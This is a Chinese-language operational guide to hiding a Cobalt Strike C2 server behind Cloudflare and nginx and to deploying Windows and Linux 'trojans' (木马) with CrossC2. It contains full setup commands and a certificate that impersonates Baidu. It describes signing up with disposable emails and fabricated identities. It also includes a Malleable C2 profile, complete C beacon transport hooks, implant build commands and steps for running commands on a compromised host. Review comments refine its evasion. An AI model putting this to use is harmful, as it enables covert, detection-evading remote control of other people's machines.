C2服务器隐藏与Linux上线
C2服务器隐藏与Linux上线技术指南
一、工具准备
- 国外服务器一台
- 自由鲸(VPN)
- Cobalt Strike 4.4
- nginx
二、C2服务器基础配置
1. 服务器禁ping
# 编辑配置文件
# Open the kernel sysctl configuration
vim /etc/sysctl.conf
# Add this line: drop all inbound ICMP echo requests (hides from plain ping only; see the note below)
net.ipv4.icmp_echo_ignore_all=1
# Apply the file without a reboot
sysctl -p
效果:服务器不再响应 ICMP echo,普通 ping 失败;但这只能骗过最粗浅的探测——nmap 的 -Pn 或基于 TCP SYN/ACK 的主机发现仍能判定主机存活。真正的隐藏依赖后文的 CDN 与反向代理,同时建议在防火墙上只放行 Cloudflare 回源 IP 段访问 443,并只允许操作员 IP(或 SSH 隧道)访问 teamserver 端口。
2. 修改C2默认端口
# 编辑teamserver文件
# Edit the teamserver start script
vim teamserver
# Search for 50050 (the default, widely fingerprinted team server port) and change it to any free port (e.g. 65000).
# Changing the port is cosmetic: also firewall it so only operator IPs (or an SSH tunnel) can reach it.
# Start the team server: <server-ip> <password>. "xiao" is only a demo value; use a long random password,
# since anyone who can reach the port and knows it gets full control of the C2.
./teamserver xx.xx.xx.xx xiao
三、证书修改
方法一:生成新密钥库(推荐)
# 删除原有密钥库
# Remove the stock keystore: the default Cobalt Strike certificate is a widely fingerprinted indicator
rm -f cobaltstrike.store
# Generate a new keystore with a less conspicuous subject.
# NOTE(review): the teamserver start script appears to hard-code the store password (the profile below also
# uses 123456), so keep 123456 here unless that script is changed as well (see method two).
# keytool's default validity is 90 days; add -validity <days> if the server must outlive that.
keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias baidu -dname "CN=baidu.com, OU=service operation department, O=Beijing Baidu Netcom Science Technology Co.\, Ltd, L=beijing, S=beijing, C=CN"
# Migrate the JKS store to PKCS12 in place (keytool keeps a .old backup and prints a warning; that is expected)
keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12
# Inspect the result
keytool -list -keystore cobaltstrike.store
方法二:修改启动文件
- 编辑teamserver文件
- 修改密钥库生成命令部分为上述生成命令
- 删除原有cobaltstrike.store文件
- 下次启动时会自动生成新密钥库
四、使用CDN隐藏
1. 申请免费域名(Freenom)
- 访问Freenom官网
- 获取随机域账号
- 使用临时邮箱验证
- 填写生成器生成的个人信息
- 选择并注册免费域名(如xxx.tk)。注意:Freenom 的免费域名注册目前可能已不可用,如无法注册可改用其他低价注册商,后续 Cloudflare 步骤相同。
2. Cloudflare CDN配置
- 登录Cloudflare添加站点
- 选择免费计划
- 添加DNS记录(A记录指向C2服务器IP),并确认该记录已开启 Cloudflare 代理(橙色云朵)。若只是"仅 DNS"(灰色云朵),域名会直接解析到真实 IP,CDN 隐藏就失效了。
- 修改域名DNS服务器为Cloudflare
- 关闭自动HTTPS重写和始终使用HTTPS
- 关闭Brotli压缩
3. SSL/TLS配置
- 设置加密模式为"完全"
- 在SSL/TLS->源服务器中创建证书
- 保存证书(server.pem,这是源服务器证书而不是单独的公钥)和私钥(server.key);私钥只应存放在 C2 服务器上
4. 证书打包
# 生成PKCS12格式证书
# Bundle the Cloudflare origin certificate and key into PKCS12; the -passout value becomes the store password
openssl pkcs12 -export -in server.pem -inkey server.key -out www.xxx.tk.p12 -name www.xxx.tk -passout pass:123456
# Import into a Java keystore for Cobalt Strike. The -deststorepass here must equal the password in the
# https-certificate block of cloudflare.profile.
keytool -importkeystore -deststorepass 123456 -destkeypass 123456 -destkeystore www.xxx.tk.store -srckeystore www.xxx.tk.p12 -srcstoretype PKCS12 -srcstorepass 123456 -alias www.xxx.tk
五、C2配置文件
1. 创建cloudflare.profile
# Malleable C2 profile for the Cloudflare-fronted Windows listener; run it through c2lint before starting teamserver.
https-certificate {
# keystore produced in step 四.4; the password must equal the -deststorepass used there
set keystore "www.xxx.tk.store";
set password "123456";
}
# Staged delivery: the stager fetches the full beacon from these URIs. Stageless payloads avoid this
# extra, easily fingerprinted request if the engagement allows it.
http-stager {
set uri_x86 "/api/1";
set uri_x64 "/api/2";
client {
# Host must be the CDN-fronted domain so Cloudflare can map the request to the site
header "Host" "www.xxx.tk";
}
server {
output{
print;
}
}
}
# Beacon check-in: metadata is base64 encoded and carried in the Cookie header
http-get {
set uri "/api/3";
client {
header "Host" "www.xxx.tk";
metadata {
base64;
header "Cookie";
}
}
server {
output{
print;
}
}
}
# Beacon task output: session id is appended to the URI, output goes in the body with no transform
http-post {
set uri "/api/4";
client {
header "Host" "www.xxx.tk";
id {
uri-append;
}
output{
print;
}
}
server {
output{
print;
}
}
}
2. 验证配置文件
创建c2lint文件:
vim c2lint
内容:
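#!/bin/sh
# c2lint wrapper: validates a Malleable C2 profile against the Cobalt Strike jar in the current directory.
# NOTE(review): Cobalt Strike distributions normally ship a c2lint script already; only create this if it is missing.
# "$1" is quoted so a profile path with spaces is passed as one argument; exec avoids a leftover shell process.
exec java -XX:ParallelGCThreads=4 -XX:+UseParallelGC -classpath ./cobaltstrike.jar c2profile.Lint "$1"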
执行验证:
./c2lint cloudflare.profile
六、Nginx反向代理配置
1. 安装Nginx
# Install nginx and confirm the installed version
apt install nginx
nginx -v
2. 修改配置文件
cd /etc/nginx/sites-enabled
# This file is included from inside the http {} block of nginx.conf, so it must contain server {} blocks only
sudo vim default
内容:
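# Decoy HTTPS site on the C2 host, terminated with the Cloudflare origin certificate from step 四.3.
server {
    listen 443 ssl http2;
    server_name www.xxx.tk;
    root /var/www/https;
    index index.html;
    ssl_certificate /opt/zs/server.pem;
    ssl_certificate_key /opt/zs/server.key;
}
# Plain HTTP: redirect to HTTPS. The original dropped the request path; $request_uri keeps path and
# query so the decoy behaves like a real site.
server {
    listen 80;
    server_name www.xxx.tk xxx.tk;
    return 301 https://www.xxx.tk$request_uri;
}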
3. 创建测试页面
cd /var/www
mkdir https
cd https
# Decoy document root served by the 443 vhost
vim index.html
内容:hello,I am is https!(这只是占位页;上线后建议换成一个看起来像正常站点的页面,这种占位内容本身就是 C2 特征)
4. 重启Nginx
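# Validate the configuration first; a syntax error would otherwise take the decoy site (and the C2 path) down
sudo nginx -t
# A reload is enough to pick up the new config; the original reload followed by a full restart was redundant
sudo systemctl reload nginx.service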
七、启动C2服务器
# Start the team server with the profile: <server-ip> <password> <profile>. 123456 is only a demo password.
./teamserver xx.xx.xx.xx 123456 cloudflare.profile
八、生成Windows木马
- 创建HTTPS监听器(HTTPS Host 填 www.xxx.tk 而不是服务器 IP,否则木马会绕过 CDN 直连真实 IP;注意Cloudflare免费版支持的端口)
- HTTP: 80, 8080, 8880, 2052, 2082, 2086, 2095
- HTTPS: 443, 2053, 2083, 2087, 2096, 8443
- 生成exe木马
- 运行木马,验证上线
九、Linux上线配置
1. Cloudflare缓存配置
创建规则:
- 条件:
  - 条件:ip.src == xx.xx.xx.xx(C2服务器真实IP)
  - 操作:选择"绕过缓存"
  注意:ip.src 匹配的是请求的来源 IP(一般是目标机器的出口 IP),而不是 C2 服务器自身;按上面的条件只有从 C2 服务器发起的请求才会绕过缓存。若要让 Beacon 流量不被缓存,可改用按 URI 路径匹配(如 http.request.uri.path contains "/aaaaaaaaa"),或依赖后文 profile 中 Cache-Control/Pragma: no-cache 响应头。
2. Nginx高级配置
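# Goes into /etc/nginx/sites-enabled/default, which nginx already includes inside its http {} block,
# so there is no enclosing http { } wrapper here (it would fail "nginx -t" with "http directive is not allowed here").
server {
    listen 443 ssl;
    # must be the CDN-fronted hostname (the original had the placeholder "aaa")
    server_name www.xxx.tk;
    root /var/www/https;
    index index.html;
    ssl_certificate /opt/zs/server.pem;
    ssl_certificate_key /opt/zs/server.key;
    ssl_session_timeout 5m;
    ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4;
    # TLS 1.1 dropped: it is deprecated, and Cloudflare connects to origins with 1.2+ anyway
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_prefer_server_ciphers on;

    # Beacon paths (same prefixes as cloudflare.profile and c2profile.c) are proxied to the local
    # Cobalt Strike listener on 9090; everything else is served from the decoy root.
    # Behind Cloudflare $remote_addr is a Cloudflare edge IP; the real client IP arrives in CF-Connecting-IP.
    # Consider allow-listing Cloudflare's IP ranges here so the origin cannot be reached directly.
    location /aaaaaaaaa {
        proxy_pass https://127.0.0.1:9090/aaaaaaaaa;
        expires off;
        proxy_redirect off;
        # header name fixed (the original had the misspelling "X-Forworded-For")
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Real-IP $remote_addr;
    }
    location /bbbbbbbbb {
        proxy_pass https://127.0.0.1:9090/bbbbbbbbb;
        expires off;
        proxy_redirect off;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Real-IP $remote_addr;
    }
}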
3. 修改c2profile.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
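/*
 * CrossC2 rebind hook: build the HTTP GET the Linux beacon sends to check in.
 *
 * reqData        NUL-terminated, already-encoded beacon metadata; it is placed in the
 *                SESSION cookie (the http-get client block of cloudflare.profile describes
 *                this layout). A NULL reqData is treated as an empty string.
 * outputData     receives a heap buffer holding the raw request (caller owns/frees it).
 * outputData_len receives the request length in bytes (without the trailing NUL).
 *
 * The original sprintf'ed into a fixed 20000-byte stack buffer, which overflows once
 * reqData grows past roughly 19.7 KB. The size is now measured first and the buffer
 * allocated to fit. On failure outputData is NULL and outputData_len is 0.
 */
void cc2_rebind_http_get_send(char *reqData, char **outputData, long long *outputData_len) {
    printf("cc2_get_send\n");
    /* Request template. Host must be the CDN-fronted domain so the CDN can map the request to the site.
     * NOTE(review): "gzip, br" invites the CDN to compress the reply while the recv side searches the body
     * for plain-text markers; confirm that CrossC2 decompresses before the rebind hook runs. */
    static const char fmt[] =
        "GET /%s HTTP/1.1\r\n"
        "Host: www.xxx.tk\r\n"
        "Accept-Encoding: gzip, br\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1\r\n"
        "Cookie: SESSION=%s\r\n"
        "Connection: close\r\n\r\n";
    /* Must match the http-get uri in the profile and the nginx location block. */
    const char *uri = "aaaaaaaaa";
    const char *meta = (reqData != NULL) ? reqData : "";

    *outputData = NULL;
    *outputData_len = 0;

    /* Measure first, then format into an exactly sized buffer. */
    int needed = snprintf(NULL, 0, fmt, uri, meta);
    if (needed < 0) {
        return;
    }
    size_t len = (size_t)needed;
    char *buf = calloc(len + 1, 1); /* +1 keeps it a valid C string; len excludes the NUL */
    if (buf == NULL) {
        return;
    }
    snprintf(buf, len + 1, fmt, uri, meta);
    *outputData = buf;
    *outputData_len = (long long)len;
}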
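/*
 * CrossC2 rebind hook: build the HTTP POST that carries beacon task output.
 *
 * reqData        NUL-terminated body; cloudflare.profile base64-encodes the output before this hook,
 *                so strlen() is the exact byte count for Content-Length. NULL is treated as "".
 * id             NUL-terminated encoded session id, sent as the SESSION query parameter
 *                (matching `id { parameter "SESSION"; }` in the profile). NULL is treated as "".
 * outputData     receives a heap buffer with the raw request (caller owns/frees it).
 * outputData_len receives the request length in bytes (without the trailing NUL).
 *
 * Fixes versus the original: Content-Length was printed with %d from a size_t (undefined
 * behaviour), the allocation relied on a fixed "+200" slack that a long id could exceed,
 * and the calloc results were never checked. On failure outputData is NULL and
 * outputData_len is 0.
 */
void cc2_rebind_http_post_send(char *reqData, char *id, char **outputData, long long *outputData_len) {
    printf("cc2_post_send\n");
    static const char fmt[] =
        "POST /%s?SESSION=%s HTTP/1.1\r\n"
        "Host: www.xxx.tk\r\n"
        "Accept-Encoding: gzip, br\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1\r\n"
        "Connection: close\r\n"
        "Content-Length: %zu\r\n\r\n%s";
    /* Must match the http-post uri in the profile and the nginx location block. */
    const char *uri = "bbbbbbbbb";
    const char *session = (id != NULL) ? id : "";
    const char *body = (reqData != NULL) ? reqData : "";
    size_t body_len = strlen(body);

    *outputData = NULL;
    *outputData_len = 0;

    /* Measure first, then format into an exactly sized buffer. */
    int needed = snprintf(NULL, 0, fmt, uri, session, body_len, body);
    if (needed < 0) {
        return;
    }
    size_t len = (size_t)needed;
    char *buf = calloc(len + 1, 1); /* +1 for the NUL; len excludes it */
    if (buf == NULL) {
        return;
    }
    snprintf(buf, len + 1, fmt, uri, session, body_len, body);
    *outputData = buf;
    *outputData_len = (long long)len;
}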
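/*
 * Extract the bytes between the `start` and `end` markers of an HTTP response body.
 *
 * rawData      NUL-terminated response text (the team server output is base64 per the
 *              profile, so it contains no embedded NULs).
 * rawData_len  length of rawData. NOTE(review): unused, the search relies on NUL termination
 *              exactly as the original did; if CrossC2 can hand over an unterminated buffer,
 *              this needs a bounded search instead of strstr().
 * start, end   marker strings, i.e. the prepend/append values from the profile's server output.
 * payload_len  receives the extracted length, 0 when nothing is found.
 *
 * Returns a freshly calloc'ed, NUL-terminated copy of the payload (caller frees), or NULL when
 * rawData is NULL, a marker is missing, or allocation fails.
 *
 * Fix: the end marker is now searched *after* the start marker. The original looked for it from
 * the beginning of rawData, so an end marker that preceded the start marker produced a negative
 * length, a failed calloc and a memcpy through NULL.
 */
char *find_payload(char *rawData, long long rawData_len, char *start, char *end, long long *payload_len) {
    (void)rawData_len;
    *payload_len = 0;
    if (rawData == NULL || start == NULL || end == NULL) {
        return NULL;
    }
    char *s = strstr(rawData, start);
    if (s == NULL) {
        return NULL;
    }
    char *body = s + strlen(start);
    char *e = strstr(body, end); /* search only after the start marker */
    if (e == NULL) {
        return NULL;
    }
    size_t n = (size_t)(e - body);
    char *payload = calloc(n + 1, 1); /* +1: NUL-terminated, and never a zero-sized allocation */
    if (payload == NULL) {
        return NULL;
    }
    memcpy(payload, body, n);
    *payload_len = (long long)n;
    return payload;
}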
/*
 * CrossC2 rebind hook: pull the beacon task data out of the HTTP GET response.
 * The markers are the prepend/append strings of the http-get server output in
 * cloudflare.profile. outputData receives the extracted copy (or NULL) and
 * outputData_len its length (0 when nothing was found).
 */
void cc2_rebind_http_get_recv(char *rawData, long long rawData_len, char **outputData, long long *outputData_len) {
    printf("cc2_get_recv\n");
    long long extracted = 0;
    char *body = find_payload(rawData, rawData_len, "ffffffff1", "eeeeeeee2", &extracted);
    *outputData = body;
    *outputData_len = extracted;
}
/*
 * CrossC2 rebind hook: pull the team server's reply out of the HTTP POST response.
 * Uses the same ffffffff1 / eeeeeeee2 markers as the http-post server output in
 * cloudflare.profile. outputData receives the extracted copy (or NULL) and
 * outputData_len its length (0 when nothing was found).
 */
void cc2_rebind_http_post_recv(char *rawData, long long rawData_len, char **outputData, long long *outputData_len) {
    printf("cc2_post_recv\n");
    long long found = 0;
    *outputData = find_payload(rawData, rawData_len, "ffffffff1", "eeeeeeee2", &found);
    *outputData_len = found;
}
4. 更新cloudflare.profile
# Updated profile for the CrossC2 Linux beacon. The URIs and the ffffffff1 / eeeeeeee2 markers must stay
# in sync with c2profile.c and the nginx location blocks; re-run c2lint after every change.
https-certificate {
set keystore "www.xxx.tk.store";
set password "123456";
}
http-get {
# same prefix as the nginx location and the GET template in cc2_rebind_http_get_send
set uri "/aaaaaaaaa";
set verb "GET";
client {
header "Accept" "accccccc";
header "Host" "www.xxx.tk";
header "Referer" "http://www.xxx.tk/";
# NOTE(review): c2profile.c advertises "gzip, br" instead; keep the two in step if a consistent fingerprint matters
header "Accept-Encoding" "gzip, deflate";
metadata {
base64url;
# NOTE(review): c2profile.c also writes "Cookie: SESSION=%s"; confirm with the CrossC2 docs that the reqData
# handed to the hook is the bare encoded metadata, otherwise the prefix would appear twice
prepend "SESSION=";
header "Cookie";
}
}
server {
header "Server" "nginx";
header "Cache-Control" "max-age=0, no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
# NOTE(review): not a valid Content-Type (no media type); a real nginx would send e.g. "text/html; charset=utf-8"
header "Content-Type" "charset=utf-8";
output {
base64;
# markers searched for by find_payload() in c2profile.c
prepend "ffffffff1";
append "eeeeeeee2";
print;
}
}
}
http-post {
# same prefix as the nginx location and the POST template in cc2_rebind_http_post_send
set uri "/bbbbbbbbb";
set verb "POST";
client {
header "Accept" "accccccc";
header "Host" "www.xxx.tk";
header "Referer" "http://www.xxx.tk/";
header "Accept-Encoding" "gzip, deflate";
id {
base64;
# carried as the ?SESSION= query parameter built in cc2_rebind_http_post_send
parameter "SESSION";
}
output {
# base64 body, so strlen() of the body is the correct Content-Length in the C sender
base64;
print;
}
}
server {
header "Server" "nginx";
header "Cache-Control" "max-age=0, no-cache";
header "Pragma" "no-cache";
header "Connection" "keep-alive";
header "Content-Type" "charset=utf-8";
output {
mask;
base64url;
# same markers as http-get so one find_payload() serves both recv hooks
prepend "ffffffff1";
append "eeeeeeee2";
print;
}
}
}
十、启动C2并配置客户端
- 启动C2服务器:
  ./teamserver xx.xx.xx.xx 123456 cloudflare.profile
下载并加载CrossC2插件:
- CrossC2-GithubBot-2022-06-07.cna
- CrossC2Kit_Loader.cna
- 创建监听器:HTTPS 类型,HTTPS Host 填 www.xxx.tk、HTTPS Port (C2) 填 443(木马经 CDN 连接 443),HTTPS Port (Bind) 填 9090,供本机 nginx 反代到 https://127.0.0.1:9090;不要把监听器直接暴露在公网端口上。
- 验证公网访问:
  - https://www.xxx.tk/ → 200
  - https://www.xxx.tk/aa → 404
  - https://www.xxx.tk/aaaaaaaaa → 200
十一、生成Linux木马
- 下载genCrossC2.Linux和c2profile.c到C2服务器
- 编译so文件:
  gcc c2profile.c -o libc2.so -fPIC -shared
- 生成Linux木马:
  ./genCrossC2.Linux www.xxx.tk 443 .cobaltstrike.beacon_keys libc2.so Linux x64 a.out
  (.cobaltstrike.beacon_keys 位于 teamserver 目录,是该 C2 的 Beacon 密钥材料,只在 C2 服务器上使用,不要随木马一起分发)
十二、Linux机器上线
- 上传a.out到目标机器
- 赋予执行权限并运行:
  chmod +x a.out && ./a.out
十三、交互操作
1. 命令执行
- 右键会话 → "会话交互"
- 输入Linux命令:
  shell whoami
  shell ifconfig
2. 文件操作
- 右键 → "Explore" → "文件浏览器"
- 可查看、上传、下载文件
3. 进程查看
- 右键 → "Explore" → "Process List"
- 查看目标机器进程信息
以上为完整的C2服务器隐藏与Linux上线技术指南,涵盖了从基础配置到高级隐藏技术的所有关键步骤。